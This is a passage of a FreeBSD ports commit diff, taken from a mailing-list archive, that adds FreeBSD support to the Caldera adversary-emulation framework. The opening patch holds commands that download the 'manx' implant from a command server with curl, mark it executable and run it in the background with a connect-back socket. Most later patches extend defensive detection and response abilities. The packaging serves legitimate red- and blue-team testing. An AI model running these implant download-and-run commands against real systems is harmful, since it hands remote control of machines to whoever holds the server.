+x #{agents.implant_name}; ++ ./#{agents.implant_name} -http $server -socket $socket -contact $contact -v ++ variations: ++ - description: Run against the UDP contact ++ command: | ++ server="#{app.contact.http}"; ++ socket="#{app.contact.udp}"; ++ contact="udp"; ++ agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; ++ nohup ./$agent -http $server -socket $socket -contact $contact & ++ - description: Download with a random name and start as a background process ++ command: | ++ server="#{app.contact.http}"; ++ socket="#{app.contact.tcp}"; ++ contact="tcp"; ++ agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; ++ nohup ./$agent -http $server -socket $socket -contact $contact & + windows: + psh: + command: | diff --git a/security/caldera/files/patch-plugins_manx_update-shells.sh b/security/caldera/files/patch-plugins_manx_update-shells.sh new file mode 100644 index 000000000000..97280531ab7d --- /dev/null +++ b/security/caldera/files/patch-plugins_manx_update-shells.sh @@ -0,0 +1,12 @@ +--- plugins/manx/update-shells.sh.orig 2022-08-08 23:34:48 UTC ++++ plugins/manx/update-shells.sh +@@ -1,7 +1,8 @@ +-#!/bin/bash ++#!/bin/sh + cwd=$(pwd) + cd shells + GOOS=windows go build -o ../payloads/manx.go-windows -ldflags="-s -w" manx.go + GOOS=linux go build -o ../payloads/manx.go-linux -ldflags="-s -w" manx.go + GOOS=darwin go build -o ../payloads/manx.go-darwin -ldflags="-s -w" manx.go ++GOOS=freebsd go build -o ../payloads/manx.go-freebsd -ldflags="-s -w" manx.go + cd $cwd diff --git a/security/caldera/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml b/security/caldera/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml new file mode 100644 index 000000000000..4df13e956c00 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml @@ -0,0 +1,15 @@ +--- plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml +@@ -24,3 +24,12 @@ + python elasticat.py --server=$server --es-host="http://127.0.0.1:9200" --group=blue --minutes-since=60 + cleanup: | + pkill -f elasticat ++ freebsd: ++ sh: ++ command: | ++ server="#{app.contact.http}"; ++ curl -s -X POST -H "file:elasticat.py" -H "platform:freebsd" $server/file/download > elasticat.py; ++ pip install requests; ++ python elasticat.py --server=$server --es-host="http://127.0.0.1:9200" --group=blue --minutes-since=60 ++ cleanup: | ++ pkill -f elasticat diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml new file mode 100644 index 000000000000..e34453b7e11c --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml @@ -0,0 +1,11 @@ +--- plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml +@@ -9,7 +9,7 @@ + name: x + repeatable: True + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + find /var/mail -type f -exec grep "From.*@.*\..*" {} \; | cut -d'@' -f2 | cut -d' ' -f1 | sort --uniq diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml new file mode 100644 index 000000000000..2962be97e40c --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml +@@ -17,7 +17,7 @@ + - source: remote.port.unauthorized + edge: has_pid + target: host.pid.unauthorized +- linux: ++ freebsd,linux: + sh: + command: | + ps aux | grep -v grep | grep #{remote.port.unauthorized} | awk '{print $2}' +@@ -34,4 +34,4 @@ + plugins.response.app.parsers.process: + - source: remote.port.unauthorized + edge: has_pid +- target: host.pid.unauthorized +\ No newline at end of file ++ target: host.pid.unauthorized diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml new file mode 100644 index 000000000000..5c45a62b261e --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: True + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + filepath="#{file.sensitive.path}"; +@@ -46,4 +46,4 @@ + edge: has_hash + target: file.sensitive.hash + - plugins.stockpile.app.requirements.paw_provenance: +- - source: file.sensitive.hash +\ No newline at end of file ++ - source: file.sensitive.hash diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml new file mode 100644 index 000000000000..bb5c268f119d --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: True + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + directory="#{directory.sensitive.path}"; +@@ -68,4 +68,4 @@ + edge: has_hash + target: directory.sensitive.hash + - plugins.stockpile.app.requirements.paw_provenance: +- - source: directory.sensitive.hash +\ No newline at end of file ++ - source: directory.sensitive.hash diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml new file mode 100644 index 000000000000..04e09ebbabbd --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml @@ -0,0 +1,11 @@ +--- plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml +@@ -8,7 +8,7 @@ + name: x + repeatable: True + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + set -f; diff --git a/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml new file mode 100644 index 000000000000..9c0b12919fb9 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml @@ -0,0 +1,11 @@ +--- plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml +@@ -28,7 +28,7 @@ + - source: host.process.guid + edge: has_interesting + target: investigate.process.guid +- linux: ++ freebsd,linux: + elasticsearch: + *cmd + darwin: diff --git a/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml new file mode 100644 index 000000000000..1fa277437813 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml @@ -0,0 +1,11 @@ +--- plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml +@@ -25,7 +25,7 @@ + - source: host.process.guid + edge: has_interesting + target: investigate.process.parent_guid +- linux: ++ freebsd,linux: + elasticsearch: + *cmd + darwin: diff --git a/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml new file mode 100644 index 000000000000..2879ff2bff30 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml @@ -0,0 +1,11 @@ +--- plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml +@@ -22,7 +22,7 @@ + - source: host.process.guid + edge: has_interesting + target: investigate.process.guid +- linux: ++ freebsd,linux: + elasticsearch: + *cmd + darwin: diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml new file mode 100644 index 000000000000..85edefaa30f9 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml +@@ -8,7 +8,7 @@ + attack_id: x + name: x + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + kill -9 #{host.pid.unauthorized} +@@ -25,4 +25,4 @@ + taskkill /pid #{host.pid.unauthorized} /f + requirements: + - plugins.stockpile.app.requirements.paw_provenance: +- - source: host.pid.unauthorized +\ No newline at end of file ++ - source: host.pid.unauthorized diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml new file mode 100644 index 000000000000..e28abe22f8d4 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml +@@ -7,7 +7,7 @@ + attack_id: x + name: x + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + if ! test -f hosts_backup; then cp /etc/hosts hosts_backup; fi; +@@ -27,4 +27,4 @@ + if (-not (Test-Path -Path .\hosts_backup)) { Copy-Item -Path c:\windows\system32\drivers\etc\hosts -Destination .\hosts_backup; }; + Add-Content c:\windows\system32\drivers\etc\hosts "127.0.0.1`t#{remote.suspicious.url}"; + cleanup: | +- Move-Item -Path .\hosts_backup -Destination c:\windows\system32\drivers\etc\hosts -Force +\ No newline at end of file ++ Move-Item -Path .\hosts_backup -Destination c:\windows\system32\drivers\etc\hosts -Force diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml new file mode 100644 index 000000000000..26f61e8f83cd --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml +@@ -7,7 +7,7 @@ + attack_id: x + name: x + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + crontab -u #{host.user.name} -l > temp_crontab; +@@ -35,4 +35,4 @@ + edge: has_new_cronjob + target: host.new.cronjob + - plugins.stockpile.app.requirements.paw_provenance: +- - source: host.new.cronjob +\ No newline at end of file ++ - source: host.new.cronjob diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml new file mode 100644 index 000000000000..72c7f5fec0b7 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + directory="#{directory.sensitive.path}"; +@@ -40,4 +40,4 @@ + - plugins.stockpile.app.requirements.paw_provenance: + - source: directory.sensitive.backup + - plugins.stockpile.app.requirements.paw_provenance: +- - source: directory.sensitive.path +\ No newline at end of file ++ - source: directory.sensitive.path diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml new file mode 100644 index 000000000000..f87d3e750316 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + cp -f /tmp/sensitive_file_backups/#{file.backup.name} #{file.sensitive.path} +@@ -31,4 +31,4 @@ + - plugins.stockpile.app.requirements.paw_provenance: + - source: file.backup.name + - plugins.stockpile.app.requirements.paw_provenance: +- - source: file.sensitive.path +\ No newline at end of file ++ - source: file.sensitive.path diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml new file mode 100644 index 000000000000..fb7e82cf61c0 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml @@ -0,0 +1,11 @@ +--- plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + mkdir -p /tmp/sensitive_file_backups; diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml new file mode 100644 index 000000000000..fa5a362e9b9e --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + output=""; +@@ -87,4 +87,4 @@ + } + requirements: + - plugins.response.app.requirements.source_fact: +- - source: directory.sensitive.path +\ No newline at end of file ++ - source: directory.sensitive.path diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml new file mode 100644 index 000000000000..966f5dfa6125 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + mkdir -p /tmp/sensitive_file_backups; +@@ -67,4 +67,4 @@ + Remove-Item -Recurse -Force C:\Users\Public\sensitive_file_backups; + requirements: + - plugins.response.app.requirements.source_fact: +- - source: file.sensitive.path +\ No newline at end of file ++ - source: file.sensitive.path diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml new file mode 100644 index 000000000000..fac4b766aaa3 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + mkdir -p /tmp/sensitive_file_backups; +@@ -104,4 +104,4 @@ + then rm -f $file; + fi; + done; +- rm -rf /tmp/sensitive_file_backups; +\ No newline at end of file ++ rm -rf /tmp/sensitive_file_backups; diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml new file mode 100644 index 000000000000..5d580c3b3239 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/setup/ba907d7a-b334-47e7-b652-4e481b5aa534.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/ba907d7a-b334-47e7-b652-4e481b5aa534.yml +@@ -7,7 +7,7 @@ *** 2939 LINES SKIPPED ***
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?202304290609.33T69QrF017173>